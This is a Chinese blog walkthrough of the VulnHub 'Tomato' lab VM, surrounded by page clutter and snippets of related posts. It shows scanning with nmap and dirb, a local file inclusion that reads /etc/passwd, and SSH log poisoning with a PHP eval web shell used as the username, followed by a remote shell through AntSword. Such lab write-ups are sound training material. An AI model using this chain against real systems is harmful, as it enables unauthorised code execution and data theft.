tomato靶机攻略

原创于 2025-07-21 18:24:23 发布 · 302 阅读

2 ·

CC 4.0 BY-SA版权

文章标签：

#linux #运维 #服务器

一、环境搭建

下载好Tomato文件，创建靶机，网络适配器设置改为nat

二、Tomato

打开kali虚拟机

查看kali主机的ip为192.168.192.128

用nmap扫描⼀下kali主机IP，同网段存活ip，找到靶机的ip

nmap -sP 192.168.192.0/24

靶机ip为134，访问该ip

用nmap进行端口扫描

nmap -p- -sV 192.168.192.134

发现开放了如上端口,尝试访问

发现没用，用dirsearch进行目录扫描

dirb http://192.168.192.134/

扫描结果如下

尝试访问目录

发现可以任意打开，存在目录遍历漏洞

查看info.php的网页源码，发现存在文件包含漏洞

在URL后面输入 ?image=/etc/passwd，成功显示，说明存在文件包含漏洞

根据前面的端口2211是一个ssh(远程连接服务)，我们尝试连接

ssh '<?php @eval($_POST[a]);?>'@192.168.192.134 -p 2211

然后在网页端查看ubuntu报错信息：/var/log/auth.log

/var/log/auth.log 记录了所有和用户认证相关的日志。无论是我们通过 ssh 登录，还是通过 sudo 执行命令都会在 auth.log 中产生记录

该目录下发现多了一些报错信息，大概率写入木马成功，使用中国蚁剑进行连接，密码为上文的a

成功拿到整个网站的信息且可以执行终端命令

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Paper_F1nd

关注关注

5
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

【愚公系列】2023年06月网络安全高级班 101.CTF黑客比赛（Tomato靶机）

时光隧道

06-05

4600

Tomato靶机是一个用于渗透测试和漏洞研究的虚拟机。它是由Tomato Security公司开发的，基于Debian操作系统，并包含了多个常见的漏洞和安全工具，如Metasploit、Nmap、Burp Suite等。它模拟了一个真实的网络环境，用户可以在其中执行实际的攻击和渗透测试，以测试其安全性和发现潜在的漏洞。Tomatosecurity官网提供了Tomato靶机的下载和使用说明。

VulnHub渗透测试实战靶场 - Tomato：1

LYJ20010728的博客

08-19

2837

VulnHub渗透测试实战靶场 - Tomato：1环境下载Tomato：1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权环境下载戳此进行环境下载 Tomato：1靶机搭建将下载好的靶机导入Vmware，网络连接设置为NAT模式即可渗透测试信息搜集用arp-scan探测一下网段内目标靶机的IP：sudo arp-scan -l 得到目标靶机的IP为：192.168.246.137 使用 nmap 扫描开放的端口：sudo nmap -sC -sV -p 1-100

参与评论您还未登录，请先登录后发表或查看评论

【每日打靶练习】Vulnhub靶机平台-tomato

leo788的博客

12-30

1784

在网页的下边找到包含内容，通过返回信息中的用户属性得到信息：root用户可以执行shell，下方的tomato用户也可以执行shell，继续。尝试ssh连接，这里使用错误的用户名和错误的密码，输入三次后，写入日志中，检查一下log，成功获取到日志信息，可通过修改ruser来进行注入。刷新日志进行查看，发现注入未显示，证明注入成功，木马被作为代码执行，若显示则失败，代码木马作为文本执行。包含失败，这里未开放远程包含，同时本地包含文件无可再利用—》转换思路。执行后的匹配到相应漏洞，选择可能性高的来试一下。

Tomato靶机

a666666688的博客

08-02

671

这意味着如果攻击者能够控制传入 $_POST["1"] 的内容，他们就可以在服务器上执行任意恶意代码，从而导致服务器被入侵、数据泄露、服务被破坏等严重后果。它的目的是尝试通过 SSH 连接到 IP 地址为 192.168.47.140 的主机，端口号为 2211 ，并传递了一段 PHP 代码

tomato靶机

最新发布

ppkr_itt的博客

11-05

2126

如果allow_url_fopen和allow_url_include同时是On状态，同时开着那就是远程文件上传包含漏洞。allow_url_fopen是On状态，打开着有可能是文件包含漏洞，而且是本地文件上传包含漏洞。2211开放的ssh服务，我们可以连接访问会有新的日志回显，连接会失败但是我们只是连接一下看。把用户换成一句话木马，发现连接被拒绝，旧版kali可以连接，新版不可以用这么复杂格式连接。info.php是有用的页面，是phpinfo()页面。

Tomato靶机攻略

qq_68186313的博客

07-29

315

2、通过nmap -sA 192.168.168.0/24得到靶机IP。5、通过查看源码，发现其存在文件包含漏洞，利用该漏洞查看日志文件。49.128扫描敏感目录。7、用蚁剑连接一句话木马。

Tomato靶机复现过程

weixin_67729650的博客

08-04

2375

这里我们看到了有一个用户Tomato的uid为1000（我们linux主机创建的第一个用户的uid为1000）,且它的shell为/bin/bash（说明可以分配终端）,再结合我们前面扫到的2211远程连接端口，说明这个用户是可以被远程连接的,我们知道了用户名,知道了端口号,知道了ip地址，就差密码就可以远程连接这个靶机了,既然前面可以看/etc/passwd,我们也可以看一下/etc/shadow文件,这样密码也知道了,那不就拿下了?紧接着我们可以试试我们学过的文件包含的漏洞知识，去试试。

Vulnhub-Tomato靶机实战

御七彩虹猫

05-06

1227

Vulnhub-Tomato靶机实战

tomato靶机渗透测试

weixin_49340699的博客

07-28

1618

tomato靶机渗透测试环境工具流程总结环境靶机192.168.66.128 kali192.168.66.129 工具 netdiscover nmap dirb nc CVE-2017-6074本地提权漏洞利用脚本流程主机发现 netdiscover -i eth0 -r 192.168.66.0/24 端口扫描 nmap -sV -p- -T5 192.168.66.128 ftp不存在匿名登录收集80端口信息没有收获后用dirb目录爆破爆破出目录http://192.168.6

精选资源

Vulnhub篇Tomato.zip

01-12

主要包括两部分，一部分是tomato的学习笔记过程，另一部分是，过程中使用到文件，供大家学习参考。

Tomato 靶机（详细教程）

2201_75891821的博客

07-29

619

Tomato 靶机教程

Tomato靶机教程

网安小白

07-29

669

Tomato靶机是一个用于渗透测试和漏洞研究的虚拟机。它是由Tomato Security公司开发的，基于Debian操作系统，并包含了多个常见的漏洞和安全工具，如Metasploit、Nmap、Burp Suite等。它模拟了一个真实的网络环境，用户可以在其中执行实际的攻击和渗透测试，以测试其安全性和发现潜在的漏洞。tomato靶机下载地址：https://www.vulnhub.com/entry/tomato-1,557/

靶机实战系列之Tomato靶机

Javachichi的博客

02-07

1374

内容概要：包括内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的，包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点，电子书也有200多本，由于内容的敏感性，我就不一一展示了。网上虽然也有很多的学习资源，但基本上都残缺不全的，这是我自己录的网安视频教程，上面路线图的每一个知识点，我都有配套的视频讲解。（都打包成一块的了，不能一一展开，总共300多集）

Vulnhub靶机：TOMATO_ 1

LainWith的博客

08-29

1300

系列Tomato（此系列共1台）发布日期：2020年09月14日注释：使用vmwar workstation运行虚拟机难度：低目标：取得 root 权限 + Flag主机发现端口扫描信息收集路径爬取文件包含写入日志内核漏洞枚举本地提权。...

tomato-靶机渗透

weixin_53736204的博客

07-29

1025

下载双击.ova文件，写文件名路径导入打开虚拟机用NAT模式编辑–>虚拟网络编辑器查看IP段。

2401_84919661的博客

05-12

471

技术文档也是我自己整理的，包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点，电子书也有200多本，由于内容的敏感性，我就不一一展示了。网上虽然也有很多的学习资源，但基本上都残缺不全的，这是我自己录的网安视频教程，上面路线图的每一个知识点，我都有配套的视频讲解。攻击和防守要学的东西也不少，具体要学的东西我都写在了上面的路线图，如果你能学完它们，你去就业和接私活完全没有问题。（都打包成一块的了，不能一一展开，总共300多集）同样的在日志文件中确实发现了存在相关记录。1.6 反弹shell。

Tomato靶机渗透

qq_44732584的博客

03-23

608

渗透测试

vulnhub靶场-tomato

qq_42947816的博客

03-07

8000

Vulnhub旨在提供环境，让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。

VulnhubTomato靶机详解

weixin_62457642的博客

08-03

546

靶机Tomato速刷

深入解析Tomato靶机学习笔记及实践文件

Vulnhub篇Tomato.zip是一个关于Vulnhub平台中名为Tomato靶机的学习资源包。该资源包主要分为两个部分：第一部分是关于Tomato靶机的学习笔记过程，记录了用户在渗透测试过程中的学习思路、步骤和所获得的知识；第二...